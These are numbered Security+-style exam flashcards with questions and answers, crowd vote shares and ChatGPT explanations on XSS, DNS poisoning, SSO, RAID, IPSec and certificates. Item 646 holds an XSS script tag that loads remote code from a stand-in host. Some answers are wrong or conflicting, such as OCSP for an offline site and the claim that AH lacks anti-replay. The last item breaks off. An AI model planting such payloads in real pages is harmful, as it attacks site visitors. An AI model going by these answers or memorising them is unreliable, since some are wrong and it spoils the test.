Something you can do refers to an authentication factor that relies on actions or behaviors that are specific to the user. In this case, drawing a gesture on a touch screen is a unique action that the user can perform, and it serves as an additional factor to verify the user's identity.

Biometrics typically refers to using physiological or behavioral characteristics (such as fingerprints, retina scans, or voice recognition) for authentication, which is not directly related to drawing a gesture on a touch screen.

Two-factor authentication (2FA) refers specifically to using two different factors for authentication, such as a password (something you know) and a smartphone token (something you have), but it doesn't directly address the action of drawing a gesture.

Therefore, the administrator is providing something you can do by drawing a gesture on the touch screen, which adds an additional layer of authentication beyond just the username and password (something you know).

646
Q

An analyst visits an Internet forum looking for information about a tool. The analyst finds a thread that appears to contain relevant information. One of the posts says the following:

Hello everyone,
I am having the same problem with my server. Can you help me?
<script type=”text/javascript” src=http://website.com/user.js> onload=sqlexec(); </script>

Thank you,
Joe

Which of the following BEST describes the attack that was attempted against the forum readers?

A. SQLi attack
B. DLL attack
C. XSS attack
D. API attack

A

C. XSS (Cross-Site Scripting) attack

Here’s why:

XSS (Cross-Site Scripting) attack: This type of attack occurs when a malicious script is injected into a web application. In this case, the script is embedded in the forum post itself and is designed to execute sqlexec() when the <script> tag is loaded. This script could potentially perform actions like stealing session cookies, redirecting users to malicious websites, or in some cases, exploiting vulnerabilities to execute code on the victim's browser.

Let’s briefly review why the other options are less likely:

A. SQLi (SQL Injection) attack: SQL injection attacks target databases through input fields that allow attackers to manipulate SQL queries. The provided script is not attempting to directly interact with a database through SQL queries.

B. DLL (Dynamic Link Library) attack: DLL attacks involve exploiting vulnerabilities in dynamically linked libraries, which is not evident from the provided script.

D. API attack: API attacks involve exploiting vulnerabilities in APIs (Application Programming Interfaces), which is not directly related to executing malicious JavaScript in a web browser.

Therefore, the attack described in the forum post is most accurately categorized as a C. XSS (Cross-Site Scripting) attack, where the intention is to execute unauthorized JavaScript code on the victims’ browsers who visit the forum and view the post containing the script.

647
Q

A root cause analysis reveals that a web application outage was caused by one of the company’s developers uploading a newer version of the third-party libraries that were shared among several applications. Which of the following implementations would be BEST to prevent this issue from reoccurring?

A. CASB
B. SWG
C. Containerization
D. Automated failover

A

(Community : C 82%, B 18%)
C. Containerization

Here’s why containerization is the best choice:

Containerization involves encapsulating an application and its dependencies into a container, ensuring that it runs uniformly and consistently across different computing environments. By containerizing applications, each application and its dependencies, including third-party libraries, are isolated from other applications and their environments.

Preventing Unintended Updates: With containerization, each application can have its own set of containers with specific versions of third-party libraries. This isolation prevents unintended updates to shared libraries from affecting other applications. Developers can specify and control which versions of libraries are used by each application independently.

Let’s briefly review why the other options are less suitable:

A. CASB (Cloud Access Security Broker): CASBs are used for enforcing security policies across cloud services. While useful for securing cloud-based applications and data, CASBs do not directly address the issue of inadvertent updates to shared libraries.

B. SWG (Secure Web Gateway): SWGs provide security controls for web traffic, including monitoring and filtering traffic for security threats. However, they do not prevent inadvertent updates to shared libraries within applications.

D. Automated Failover: Automated failover systems are designed to automatically switch to a standby system or resource when the primary system fails. While important for ensuring availability, failover mechanisms do not prevent application outages caused by unintended updates to shared libraries.

Therefore, C. Containerization is the most effective implementation to prevent issues caused by inadvertent updates to shared third-party libraries, ensuring application stability and consistency across environments.

648
Q

The Chief Security Officer (CSO) at a major hospital wants to implement SSO to help improve security in the environment and protect patient data, particularly at shared terminals. The Chief Risk Officer (CRO) is concerned that training and guidance have not been provided to frontline staff, and a risk analysis has not been performed. Which of the following is the MOST likely cause of the CRO’s concerns?

A. SSO would simplify username and password management, making it easier for hackers to guess accounts.
B. SSO would reduce password fatigue, but staff would still need to remember more complex passwords.
C. SSO would reduce the password complexity for frontline staff.
D. SSO would reduce the resilience and availability of systems if the identity provider goes offline.

A

D. SSO would reduce the resilience and availability of systems if the identity provider goes offline.

Here’s why this is the case:

Resilience and Availability: Single Sign-On (SSO) relies on an identity provider (IdP) to authenticate users across multiple applications and services. If the IdP experiences downtime or becomes unavailable, users may be unable to access the systems they need to perform their tasks. This dependency on a single point of authentication introduces a potential single point of failure that could disrupt critical hospital operations, affecting patient care and overall system availability.

This concern aligns with the CRO’s focus on risk analysis and ensuring that frontline staff are adequately trained and guided on the implications and potential risks associated with implementing SSO. It emphasizes the need to assess and mitigate risks related to system resilience and availability, especially in a healthcare environment where uninterrupted access to patient data and critical applications is essential.

Let’s briefly review why the other options are less likely to be the cause of the CRO’s concerns:

A. SSO would simplify username and password management, making it easier for hackers to guess accounts: While this is a valid security consideration, it is not directly related to the CRO's concerns about risk analysis, training, and system resilience.

B. SSO would reduce password fatigue, but staff would still need to remember more complex passwords: This option addresses usability concerns rather than the specific risks highlighted by the CRO related to system availability and the impact on frontline operations.

C. SSO would reduce the password complexity for frontline staff: While reducing password complexity can impact security, it does not directly address the concerns about training, guidance, and risk analysis related to system resilience.

Therefore, D. SSO would reduce the resilience and availability of systems if the identity provider goes offline is the most likely cause of the CRO’s concerns regarding the implementation of SSO in the hospital environment.

649
Q

A software developer needs to perform code-execution testing, black-box testing, and non- functional testing on a new product before its general release. Which of the following BEST describes the tasks the developer is conducting?

A. Verification
B. Validation
C. Normalization
D. Staging

A

B. Validation

Here’s why:

Validation in software testing refers to the process of evaluating software during or at the end of the development process to determine whether it satisfies specified requirements. This includes ensuring that the software meets functional and non-functional requirements through various testing methodologies.

Let’s briefly define the terms in the context provided:

Code-execution testing: This typically involves unit testing, integration testing, and system testing to verify that the code behaves as expected and meets functional requirements.

Black-box testing: This testing method examines the functionality of an application without peering into its internal structures or workings. It verifies that the software functions correctly from the end-user's perspective.

Non-functional testing: This includes testing aspects of the software that do not relate to specific behaviors or functions, such as performance testing, usability testing, security testing, and scalability testing.

These activities collectively aim to validate the software’s functionality, performance, and compliance with requirements before its general release to ensure it meets the intended specifications and user expectations.

Therefore, B. Validation best describes the tasks the developer is conducting in preparation for the product’s general release.

650
Q

Joe, a user at a company, clicked an email link that led to a website that infected his workstation. Joe was connected to the network, and the virus spread to the network shares. The protective measures failed to stop this virus, and it has continued to evade detection. Which of the following should a security administrator implement to protect the environment from this malware?

A. Install a definition-based antivirus.
B. Implement an IDS/IPS.
C. Implement a heuristic behavior-detection solution.
D. Implement CASB to protect the network shares.

A

(Brain dump: C. Implement a heuristic behavior-detection solution. )

(Community : C 72%, B 24%.
“The protective measures failed to stop this virus, and it has continued to evade detection”… Heuristic scanning (or analysis) Heuristic scanning does not rely on a virus dictionary. Instead, it looks for suspicious behavior—anything that does not fit into a “normal” pattern of behavior for the operating system (OS) and applications running on the system being protected)

Chat GPT :
B. Implement an IDS/IPS (Intrusion Detection System/Intrusion Prevention System).

Here’s why:

IDS/IPS: These systems are designed to monitor network traffic for suspicious activity or known patterns of malicious behavior. An IDS detects potential security breaches and alerts the administrator, while an IPS can proactively block or mitigate detected threats. This capability is crucial in identifying and stopping malware propagation within the network, such as the one that infected Joe's workstation and spread to network shares.

Let’s briefly review why the other options are less suitable in this context:

A. Install a definition-based antivirus: While antivirus software is essential, especially for detecting known malware signatures, the scenario suggests that the malware evaded existing protective measures, indicating it might be a new or unknown variant. Definition-based antivirus alone may not be effective against sophisticated or zero-day attacks.

C. Implement a heuristic behavior-detection solution: Heuristic analysis can detect previously unknown malware by identifying suspicious patterns or behaviors. However, its effectiveness depends on the sophistication of the malware and the robustness of the heuristic algorithms. In this scenario, where the malware has evaded detection, it may suggest the need for broader network monitoring capabilities provided by an IDS/IPS.

D. Implement CASB to protect the network shares: Cloud Access Security Broker (CASB) solutions are typically used to secure cloud services and applications. While they can monitor and control access to cloud-based resources, they are not directly applicable to protecting on-premises network shares from malware that has already infected the internal network.

Therefore, B. Implement an IDS/IPS is the best choice to enhance the network’s capability to detect and prevent further spread of malware that has already infiltrated the network shares after infecting Joe’s workstation.

651
Q

A security engineer is reviewing log files after a third party discovered usernames and passwords for the organization’s accounts. The engineer sees there was a change in the IP address for a vendor website one week earlier. This change lasted eight hours. Which of the following attacks was MOST likely used?

A. Man-in-the-middle
B. Spear-phishing
C. Evil twin
D. DNS poisoning

A

D. DNS poisoning

Here’s why DNS poisoning fits this scenario:

DNS Poisoning: Also known as DNS cache poisoning, this attack involves corrupting the DNS cache of a DNS resolver or client. If an attacker successfully poisons the DNS cache, legitimate domain name queries can be redirected to malicious IP addresses controlled by the attacker. In this case, the change in IP address for the vendor website could indicate that DNS records were manipulated to redirect traffic to a malicious server controlled by the attacker for the duration of eight hours.

Let’s briefly review why the other options are less likely in this context:

A. Man-in-the-middle: While a man-in-the-middle (MitM) attack involves intercepting and potentially altering communications between two parties, the specific mention of a change in IP address for a vendor website suggests manipulation of DNS records rather than direct interception of traffic.

B. Spear-phishing: Spear-phishing involves targeted email attacks to trick specific individuals into divulging sensitive information. There is no indication in the scenario that spear-phishing directly led to the change in IP address.

C. Evil twin: An evil twin attack typically involves setting up a rogue wireless access point that mimics a legitimate one to intercept wireless communications. This scenario describes a change in IP address for a vendor website, which is not characteristic of an evil twin attack.

Therefore, D. DNS poisoning is the most likely attack used in this scenario where the organization’s accounts’ usernames and passwords were compromised after a change in the vendor website’s IP address was detected in log files.

652
Q

A user recently entered a username and password into a recruiting application website that had been forged to look like the legitimate site. Upon investigation, a security analyst identifies the following:
– The legitimate website’s IP address is 10.1.1.20 and eRecruit.local resolves to this IP.
– The forged website’s IP address appears to be 10.2.12.99, based on NetFlow records.
– All three of the organization’s DNS servers show the website correctly resolves to the legitimate IP.
– DNS query logs show one of the three DNS servers returned a result of 10.2.12.99 (cached) at the
approximate time of the suspected compromise.
Which of the following MOST likely occurred?

A. A reverse proxy was used to redirect network traffic.
B. An SSL strip MITM attack was performed.
C. An attacker temporarily poisoned a name server.
D. An ARP poisoning attack was successfully executed.

A

C. An attacker temporarily poisoned a name server.

Here’s the reasoning:

DNS Poisoning: The DNS query logs show that one of the organization's DNS servers returned a result of 10.2.12.99 (which is the forged website's IP address) at the time of the suspected compromise. This indicates that the DNS server cache was poisoned with the incorrect IP address for the legitimate website eRecruit.local. Despite the other two DNS servers showing the correct resolution to 10.1.1.20, the compromised DNS server's cached entry led users to the forged website when they attempted to access eRecruit.local.

Let’s briefly review why the other options are less likely in this context:

A. A reverse proxy was used to redirect network traffic: While a reverse proxy can redirect traffic, it typically operates at the application layer and would not directly affect DNS resolution to the extent described in the scenario.

B. An SSL strip MITM attack was performed: SSL stripping involves downgrading HTTPS connections to HTTP to intercept traffic, but it does not directly manipulate DNS resolution or redirect users to a forged website based on DNS responses.

D. An ARP poisoning attack was successfully executed: ARP poisoning involves manipulating ARP (Address Resolution Protocol) messages to associate a different MAC address with an IP address, typically within a local network. This attack is not related to DNS resolution and would not affect DNS server responses.

Therefore, C. An attacker temporarily poisoned a name server is the most likely scenario based on the DNS query logs showing an incorrect IP address cached by one of the organization’s DNS servers, leading users to enter credentials into a forged website masquerading as the legitimate one.

653
Q

A recent audit uncovered a key finding regarding the use of a specific encryption standard in a web application that is used to communicate with business customers. Due to the technical limitations of its customers, the company is unable to upgrade the encryption standard. Which of the following types of controls should be used to reduce the risk created by this scenario?

A. Physical
B. Detective
C. Preventive
D. Compensating

A

D. Compensating

Here’s why compensating controls are suitable in this scenario:

Compensating Controls: These controls are alternative measures implemented when it is not feasible to implement the primary control or when the primary control alone is not sufficient. In the context of encryption standards, if upgrading to a more secure standard is not possible due to technical constraints of business customers, compensating controls can be implemented to mitigate the associated risks.

For example, compensating controls could include:

Enhanced monitoring and logging: Implementing additional detective controls to monitor and detect suspicious activities related to encryption.
Stronger authentication mechanisms: Strengthening user authentication to mitigate the risk of unauthorized access even if encryption strength is limited.
Segmentation and isolation: Isolating sensitive data or systems to reduce exposure if encryption is compromised.

These controls help to compensate for the reduced security provided by the outdated encryption standard, thereby reducing the overall risk to an acceptable level given the constraints.

Let’s briefly review why the other options are less appropriate in this scenario:

A. Physical Controls: Physical controls involve measures like locks, fences, and security guards to protect physical assets. They are not directly relevant to mitigating risks associated with encryption standards in a web application.

B. Detective Controls: Detective controls aim to detect incidents or anomalies after they have occurred. While important for monitoring and alerting, they do not address the inherent risk associated with using a less secure encryption standard.

C. Preventive Controls: Preventive controls aim to stop incidents from occurring by implementing security measures such as firewalls, access controls, and encryption standards themselves. However, since upgrading the encryption standard is not feasible, preventive controls alone cannot fully mitigate the risk in this scenario.

Therefore, D. Compensating controls are the appropriate choice to address the risk created by the inability to upgrade the encryption standard, providing alternative measures to mitigate security risks effectively.

654
Q

Which of the following is a team of people dedicated to testing the effectiveness of organizational security programs by emulating the techniques of potential attackers?

A. Red team
B. White team
C. Blue team
D. Purple team

A

A. Red team

Explanation:

Red team: A red team is a group of individuals dedicated to testing the effectiveness of organizational security measures by simulating the tactics, techniques, and procedures (TTPs) of potential attackers. They conduct simulated attacks to identify vulnerabilities in systems, processes, and personnel, often using methods similar to those of malicious actors. The goal is to provide a realistic assessment of an organization's security posture and readiness to defend against real-world threats.

Let’s briefly differentiate the other options:

B. White team: Typically refers to a group responsible for overseeing and ensuring the integrity of a testing process, ensuring it is conducted ethically and within predefined parameters. They do not actively simulate attacks like a red team.

C. Blue team: Refers to the defensive security team within an organization that responds to and defends against security incidents. They monitor systems, analyze logs, and implement defensive measures to protect against real threats.

D. Purple team: A purple team is a collaborative approach where red and blue teams work together closely. The red team simulates attacks, and the blue team defends against them, with both teams sharing knowledge and insights to improve overall security.

Therefore, A. Red team specifically describes the team dedicated to testing security effectiveness through simulated attacks, making it the correct answer in this context.

655
Q

A security assessment determines DES and 3DES are still being used on recently deployed production servers.
Which of the following did the assessment identify?

A. Unsecure protocols
B. Default settings
C. Open permissions
D. Weak encryption

A

D. Weak encryption

Explanation:

DES (Data Encryption Standard) and 3DES (Triple DES) are encryption algorithms that have been deprecated due to vulnerabilities and weaknesses compared to more modern encryption standards like AES (Advanced Encryption Standard).
Using DES and 3DES on production servers is considered a security risk because they are susceptible to brute-force attacks and other cryptographic weaknesses.
Therefore, the assessment identified "weak encryption" as the issue because DES and 3DES are no longer considered secure encryption standards for protecting sensitive data.

Option A (Unsecure protocols), B (Default settings), and C (Open permissions) do not accurately describe the specific security issue related to the use of DES and 3DES on production servers. Therefore, D. Weak encryption is the correct identification based on the scenario provided.

656
Q

The cost of removable media and the security risks of transporting data have become too great for a laboratory.
The laboratory has decided to interconnect with partner laboratories to make data transfers easier and more secure. The Chief Security Officer (CSO) has several concerns about proprietary data being exposed once the interconnections are established. Which of the following security features should the network administrator implement to prevent unwanted data exposure to users in partner laboratories?

A. VLAN zoning with a file-transfer server in an external-facing zone
B. DLP running on hosts to prevent file transfers between networks
C. NAC that permits only data-transfer agents to move data between networks
D. VPN with full tunneling and NAS authenticating through the Active Directory

A

(Community D 43%, B 26%, C 17%)
D. VPN with full tunneling and NAS authenticating through the Active Directory
For the scenario described where proprietary data might be exposed once interconnections are established with partner laboratories, option D (VPN with full tunneling and NAS authenticating through the Active Directory) offers a holistic security solution. It combines the encrypted communication features of a VPN with the strong user and device authentication mechanisms of Active Directory

VLAN zoning and VPN tunneling are both methods used to segment and secure network traffic, but they serve different purposes. VLAN zoning is a technique used to divide a network into separate virtual LANs, allowing for better control and management of network traffic within a single physical network. On the other hand, VPN tunneling creates a secure, encrypted connection over a public network, such as the internet, to connect remote users or branch offices to a central network. While VLAN zoning is more focused on internal network segmentation, VPN tunneling is used to securely connect external networks to a central network

(Brain dump: A. VLAN zoning with a file-transfer server in an external-facing zone)

657
Q

A vulnerability assessment report will include the CVSS score of the discovered vulnerabilities because the score allows the organization to better:

A. validate the vulnerability exists in the organization’s network through penetration testing.
B. research the appropriate mitigation techniques in a vulnerability database.
C. find the software patches that are required to mitigate a vulnerability.
D. prioritize remediation of vulnerabilities based on the possible impact.

A

D. prioritize remediation of vulnerabilities based on the possible impact.

Explanation:

CVSS (Common Vulnerability Scoring System) Score: The CVSS score is a standardized numerical rating that assesses the severity of a vulnerability based on several metrics, including exploitability, impact, and complexity. This score helps organizations prioritize which vulnerabilities to address first based on their potential impact on the organization's systems and data.

Prioritize remediation: By including CVSS scores in the vulnerability assessment report, organizations can prioritize their remediation efforts. Vulnerabilities with higher CVSS scores (indicating higher severity) are typically addressed first to mitigate the most significant risks to the organization's security posture.

Let’s briefly review why the other options are less applicable:

A. Validate the vulnerability exists in the organization's network through penetration testing: Penetration testing validates the existence and exploitation of vulnerabilities but does not rely on CVSS scores to do so. CVSS scores provide a severity rating rather than confirming the presence of a vulnerability.

B. Research the appropriate mitigation techniques in a vulnerability database: While CVSS scores can guide decisions on mitigation, they do not directly provide specific mitigation techniques. Organizations typically consult vulnerability databases or security advisories for detailed mitigation guidance.

C. Find the software patches that are required to mitigate a vulnerability: CVSS scores indicate the severity of a vulnerability but do not directly link to specific software patches. Organizations must still refer to vendor advisories and patch management systems to identify and apply appropriate patches.

Therefore, D. prioritize remediation of vulnerabilities based on the possible impact is the primary benefit of including CVSS scores in a vulnerability assessment report. It helps organizations allocate resources efficiently by addressing the most critical vulnerabilities first, thereby enhancing overall security posture.

658
Q

A security analyst is performing a forensic investigation involving compromised account credentials. Using the Event Viewer, the analyst was able to detect the following message: “Special privileges assigned to new logon.” Several of these messages did not have a valid logon associated with the user before these privileges were assigned. Which of the following attacks is MOST likely being detected?

A. Pass-the-hash
B. Buffer overflow
C. Cross-site scripting
D. Session replay

A

A. Pass-the-hash

Here’s why:

Pass-the-hash: This attack involves an attacker obtaining hashed credentials (typically through tools like Mimikatz) from a compromised system and then using these hashes to authenticate to other systems without needing to crack the hash into plaintext passwords. When the attacker successfully uses hashed credentials to gain access, it often triggers messages in event logs indicating special privileges assigned to a new logon without a valid initial logon session.

Event Viewer message "Special privileges assigned to new logon": This message suggests that privileges were assigned to a new logon session that did not have a valid previous logon session associated with it. This behavior is characteristic of pass-the-hash attacks where the attacker uses obtained hashes to authenticate and gain access to resources.

Let’s briefly review why the other options are less likely in this context:

B. Buffer overflow: Buffer overflow attacks exploit vulnerabilities in software to overwrite memory and gain unauthorized access to systems or execute arbitrary code. They typically do not manifest as "special privileges assigned to new logon" messages in event logs.

C. Cross-site scripting (XSS): XSS attacks involve injecting malicious scripts into web pages viewed by other users. They do not directly relate to "special privileges assigned to new logon" messages in event logs.

D. Session replay: Session replay attacks involve capturing and replaying legitimate session data to impersonate a legitimate user. They do not typically result in event log messages related to new logon sessions and special privileges.

Therefore, based on the information provided, A. Pass-the-hash is the most likely attack being detected in the forensic investigation involving compromised account credentials.

659
Q

Company engineers regularly participate in a public Internet forum with other engineers throughout the industry.
Which of the following tactics would an attacker MOST likely use in this scenario?

A. Watering-hole attack
B. Credential harvesting
C. Hybrid warfare
D. Pharming

A

A. Watering-hole attack

Here’s why:

Watering-hole attack: This type of attack involves compromising a website that the targeted individuals (in this case, company engineers) frequently visit. By infecting this legitimate website with malware, the attackers can exploit the trust of the visitors and potentially compromise their systems when they visit the infected site. Since engineers participate regularly in the forum, attackers may target the forum's website or related sites engineers commonly visit.

Credential harvesting: While credential harvesting is a common goal in various cyber attacks, it typically involves more targeted methods such as phishing or social engineering, rather than relying on the engineers' participation in public forums.

Hybrid warfare: This term usually refers to a broader concept involving military and non-military strategies and is not directly related to cyber attacks on Internet forums.

Pharming: Pharming involves redirecting users from legitimate websites to malicious ones without their knowledge, often through DNS cache poisoning or malware. While related to web security, it's less likely in the context of engineers participating in a specific public forum.

Therefore, in the scenario described, A. Watering-hole attack is the tactic that an attacker would most likely use to target company engineers participating in a public Internet forum. This tactic leverages their regular visits to specific websites to deliver malware or compromise their systems.

660
Q

As company uses wireless for all laptops and keeps a very detailed record of its assets, along with a comprehensive list of devices that are authorized to be on the wireless network. The Chief Information Officer (CIO) is concerned about a script kiddie potentially using an unauthorized device to brute force the wireless PSK and obtain access to the internal network. Which of the following should the company implement to BEST prevent this from occurring?

A. A BPDU guard
B. WPA-EAP
C. IP filtering
D. A WIDS

A

Community : B 81%, D 19%
B. WPA-EAP

WPA-EAP provides a stronger form of authentication compared to a simple Pre-Shared Key (PSK). It uses an Extensible Authentication Protocol (EAP) framework, which allows for more advanced authentication methods such as username and password, digital certificates, or token-based authentication. By requiring users to authenticate using stronger credentials, WPA-EAP makes it significantly more difficult for unauthorized devices to gain access to the wireless network through brute force attacks on the PSK.

While options like BPDU guard (A), IP filtering (C), and a WIDS (Wireless Intrusion Detection System) (D) may provide additional security measures, implementing WPA-EAP is specifically targeted at strengthening authentication for wireless access, making it the most effective solution for preventing unauthorized access via brute force attacks on the PSK.

It’s not WIDS (Wireless Intrusion Detection System). A WIDS monitors the radio spectrum for the presence of unauthorized, rogue access points and the use of wireless attack tools. The system monitors the radio spectrum used by wireless LANs, and immediately alerts a systems administrator whenever a rogue access point is detected. Conventionally it is achieved by comparing the MAC address of the participating wireless devices.

Rogue devices can spoof MAC address of an authorized network device as their own. New research uses fingerprinting approach to weed out devices with spoofed MAC addresses. The idea is to compare the unique signatures exhibited by the signals emitted by each wireless device against the known signatures of pre-authorized, known wireless devices.

Brain dump, ChatGPT :
D. A WIDS (Wireless Intrusion Detection System).

Here’s why WIDS is the best choice in this scenario:

WIDS (Wireless Intrusion Detection System): A WIDS monitors the wireless airspace for unauthorized access points, rogue devices, and potential attacks. It can detect anomalies such as brute force attempts on the wireless PSK or the presence of unauthorized devices attempting to connect to the network. By monitoring and analyzing wireless traffic, a WIDS can alert network administrators to suspicious activities and potential security breaches, allowing for prompt action to mitigate threats.

Let’s briefly review why the other options are less suitable in this context:

A. BPDU guard: BPDU guard is used to protect against spanning tree protocol (STP) attacks in Ethernet networks and is not directly related to wireless network security or preventing unauthorized devices from connecting.

B. WPA-EAP: WPA-EAP (Wi-Fi Protected Access - Extensible Authentication Protocol) provides stronger authentication mechanisms than a PSK, but it does not directly prevent unauthorized devices from attempting to brute force the PSK or gain access to the network.

C. IP filtering: IP filtering restricts traffic based on IP addresses and is not effective against unauthorized wireless devices attempting to brute force the PSK or gain access to the network.

Therefore, D. A WIDS is the best choice to help prevent unauthorized access and mitigate the risk posed by a script kiddie attempting to brute force the wireless PSK and gain access to the company’s internal network.

661
Q

In the middle of a cyberattack, a security engineer removes the infected devices from the network and locks down all compromised accounts. In which of the following incident response phases is the security engineer currently operating?

A. Identification
B. Preparation
C. Lessons learned
D. Eradication
E. Recovery
F. Containment

A

F. Containment

Here’s why:

Containment: This phase focuses on limiting the scope and impact of the incident. Actions typically include isolating affected systems or networks, removing infected devices from the network, and implementing controls to prevent further spread of the attack. By removing infected devices and locking down compromised accounts, the security engineer is actively containing the incident and preventing it from spreading further within the network.

Identification: In the Identification phase, the incident is initially detected and characterized. This involves understanding the nature and extent of the incident, which precedes the containment phase.

Eradication: The Eradication phase involves permanently removing the cause of the incident from the environment. While removing infected devices is part of containment, eradication involves deeper actions to ensure the attack vector is completely eliminated.

Recovery: The Recovery phase focuses on restoring affected systems and services to normal operations after the incident has been contained and eradicated. This phase comes after containment and eradication efforts are successful.

Preparation and Lessons learned: These phases occur before and after the incident response process itself, involving preparing for incidents and improving future response based on lessons learned, respectively.

Therefore, based on the immediate actions described, the security engineer is currently in the Containment phase, actively isolating and preventing further spread of the cyberattack within the network.

662
Q

A network administrator would like to configure a site-to-site VPN utilizing IPSec. The administrator wants the tunnel to be established with data integrity, encryption, authentication, and anti-replay functions. Which of the following should the administrator use when configuring the VPN?

A. AH
B. EDR
C. ESP
D. DNSSEC

A

(Community : C 100%)

C. ESP (Encapsulating Security Payload) is the correct choice for a site-to-site VPN when you need encryption, authentication, data integrity, and anti-replay protection.

A. AH (Authentication Header) provides authentication and data integrity but does not offer encryption or anti-replay protection. It does not encrypt the payload.
B. EDR (Endpoint Detection and Response) is a security technology used for detecting and responding to advanced threats and breaches on endpoints (computers and servers). It’s not related to configuring VPNs.
D. DNSSEC (Domain Name System Security Extensions) is used to add security to the DNS by providing authentication and data integrity for DNS data. It’s not directly related to configuring VPNs with the specified requirements.

ChatGPT:
C. ESP (Encapsulating Security Payload)

Here’s why ESP is the correct choice:

ESP (Encapsulating Security Payload): ESP provides encryption, data integrity, authentication, and anti-replay protection for the IP packets being transmitted over the VPN tunnel. It is a core protocol within IPSec that ensures the confidentiality and integrity of the data being exchanged between the two VPN endpoints.

AH (Authentication Header): AH provides data integrity and authentication, but it does not provide encryption. It is typically used when confidentiality is not required but integrity and authentication are essential.

EDR (Endpoint Detection and Response): EDR is a security solution that monitors and responds to threats on endpoints. It is not related to configuring a site-to-site VPN with IPSec.

DNSSEC (Domain Name System Security Extensions): DNSSEC is a set of extensions to DNS that provide data integrity and authentication for DNS responses. It is not used for configuring VPNs with IPSec.

Therefore, C. ESP (Encapsulating Security Payload) is the protocol that the network administrator should use to ensure the VPN tunnel provides data integrity, encryption, authentication, and anti-replay functions as required.

663
Q

A security incident may have occurred on the desktop PC of an organization’s Chief Executive Officer (CEO). A duplicate copy of the CEO’s hard drive must be stored securely to ensure appropriate forensic processes and the chain of custody are followed. Which of the following should be performed to accomplish this task?

A. Install a new hard drive in the CEO’s PC, and then remove the old hard drive and place it in a tamper-evident bag.

B. Connect a write blocker to the hard drive. Then, leveraging a forensic workstation, utilize the dd command in a live Linux environment to create a duplicate copy.

C. Remove the CEO’s hard drive from the PC, connect to the forensic workstation, and copy all the contents onto a remote fileshare while the CEO watches.

D. Refrain from completing a forensic analysis of the CEO’s hard drive until after the incident is confirmed; duplicating the hard drive at this stage could destroy evidence.

A

B. Connect a write blocker to the hard drive. Then, leveraging a forensic workstation, utilize the dd command in a live Linux environment to create a duplicate copy.

Here’s why this option is correct:

Write blocker: A write blocker is a device that allows data to be read from a storage device (like a hard drive) without allowing data to be written back to it. This ensures that the original data on the CEO's hard drive remains unchanged during the duplication process, preserving its integrity for forensic examination.

Forensic workstation: Using a dedicated forensic workstation ensures that the duplication process is conducted in a controlled environment specifically designed for handling forensic evidence. This workstation should have appropriate software and tools for creating forensically sound duplicates.

dd command in a live Linux environment: The dd command is a low-level tool that can create bit-for-bit copies of data. Running dd in a live Linux environment ensures that the duplication process does not alter the original data and captures everything on the hard drive, including deleted files and unallocated space, which may be crucial for forensic analysis.

Let’s briefly review why the other options are not as suitable:

A. Install a new hard drive and place the old hard drive in a tamper-evident bag: This option involves removing the original hard drive and installing a new one, which alters the original configuration and data on the CEO's PC before duplicating. This could potentially affect the integrity of the evidence.

C. Copy all contents onto a remote fileshare while the CEO watches: This method does not use a write blocker and does not ensure that the data is forensically preserved. Additionally, involving the CEO during the duplication process may compromise the chain of custody.

D. Refrain from completing a forensic analysis until after confirming the incident: Delaying duplication and forensic analysis could lead to loss of crucial evidence or compromise the integrity of the investigation if the hard drive is tampered with or compromised further.

Therefore, B. Connect a write blocker to the hard drive and use the dd command in a live Linux environment is the best approach to securely store a duplicate copy of the CEO’s hard drive while preserving its integrity for forensic examination.

664
Q

A security engineer at an offline government facility is concerned about the validity of an SSL certificate. The engineer wants to perform the fastest check with the least delay to determine if the certificate has been revoked. Which of the following would BEST meet these requirements?

A. RA
B. OCSP
C. CRL
D. CSR

A

B. OCSP (Online Certificate Status Protocol)

Here’s why OCSP is the most suitable choice:

OCSP (Online Certificate Status Protocol): OCSP provides real-time validation of the status of an SSL certificate. When a client (like a web browser) encounters an SSL certificate, it can query the OCSP responder to check if the certificate is still valid or if it has been revoked. This check happens instantly and does not require downloading large lists like Certificate Revocation Lists (CRLs).

RA (Registration Authority): The RA is responsible for verifying the identity of certificate requestors and typically does not handle certificate revocation checks directly.

CRL (Certificate Revocation List): CRLs contain a list of revoked certificates and must be periodically downloaded and checked against. They are not as fast as OCSP because they may require downloading a potentially large list.

CSR (Certificate Signing Request): A CSR is used during the process of requesting a new SSL certificate and is not related to checking the revocation status of an existing certificate.

Therefore, B. OCSP is the best choice for the security engineer at the offline government facility to quickly determine if an SSL certificate has been revoked, ensuring minimal delay and efficient certificate validation.

665
Q

A security administrator needs to create a RAID configuration that is focused on high read speeds and fault tolerance. It is unlikely that multiple drives will fail simultaneously. Which of the following RAID configurations should the administrator use?

A. RAID 0
B. RAID 1
C. RAID 5
D. RAID 10

A

(Community : D73%, C 24%)
D. RAID 10
RAID 10 (also known as RAID 1+0) combines the benefits of RAID 1 (mirroring) and RAID 0 (striping). It offers high read speeds because data is striped across multiple drives, resulting in parallel read operations. Additionally, it provides fault tolerance by mirroring data across multiple drives. In a RAID 10 configuration, multiple drives can fail as long as they are not part of the same mirrored pair. This configuration offers both performance and redundancy, making it ideal for scenarios where both high read speeds and fault tolerance are priorities.

ChatGPT :
D. RAID 10

Here’s why RAID 10 fits the criteria:

RAID 10 (RAID 1+0): RAID 10 combines features of both RAID 1 (mirroring) and RAID 0 (striping). It provides high read speeds by striping data across multiple drives (like RAID 0), while also offering fault tolerance by mirroring each striped set onto another set of drives. This means that data is both striped and mirrored, providing redundancy against drive failures.

High read speeds: RAID 10 offers excellent read performance because data can be read from multiple drives simultaneously due to striping. This configuration is particularly efficient for read-heavy applications and environments where quick access to data is crucial.

Fault tolerance: RAID 10 can withstand the failure of multiple drives in the array as long as they are not part of the same mirrored pair. It requires a minimum of four drives and allows for the failure of one drive in each mirrored pair without data loss.

Let’s briefly review the other RAID configurations:

RAID 0: Provides striping without redundancy. It offers high read speeds but no fault tolerance. If one drive fails, all data in the array is lost.

RAID 1: Provides mirroring without striping. It offers fault tolerance by duplicating data across drives (two drives minimum), but read speeds are typically not as high as RAID 0 or RAID 10.

RAID 5: Provides striping with distributed parity. It offers good read speeds and fault tolerance through parity information distributed across all drives. However, the rebuild process can be intensive if a drive fails.

Therefore, considering the requirement for high read speeds and fault tolerance with minimal likelihood of simultaneous multiple drive failures, RAID 10 is the best choice among the options provided.

(Brain dump: C. RAID 5 )

666
Q

Which of the following algorithms has the SMALLEST key size?

A. DES
B. Twofish
C. RSA
D. AES

A

A. DES (Data Encryption Standard)

Here’s why:

